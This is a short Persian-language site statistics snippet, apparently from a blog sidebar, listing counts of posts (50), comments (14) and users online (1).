تعداد مطالب : 50
تعداد نظرات : 14
تعداد آنلاین : 1